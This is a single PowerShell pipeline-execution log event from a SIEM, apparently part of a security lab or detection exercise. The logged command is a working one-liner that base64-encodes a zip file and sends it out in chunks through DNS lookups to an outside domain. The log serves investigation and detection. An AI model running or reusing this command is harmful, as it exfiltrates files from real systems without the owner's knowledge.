1/11/26 3:28:06.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=443  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AFBLAWQUAA AACAC9oC5XHh1O5R8AAA.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup AFBLAWQUAAACAC9oC5XHh1 O5R8AAA.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:06.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>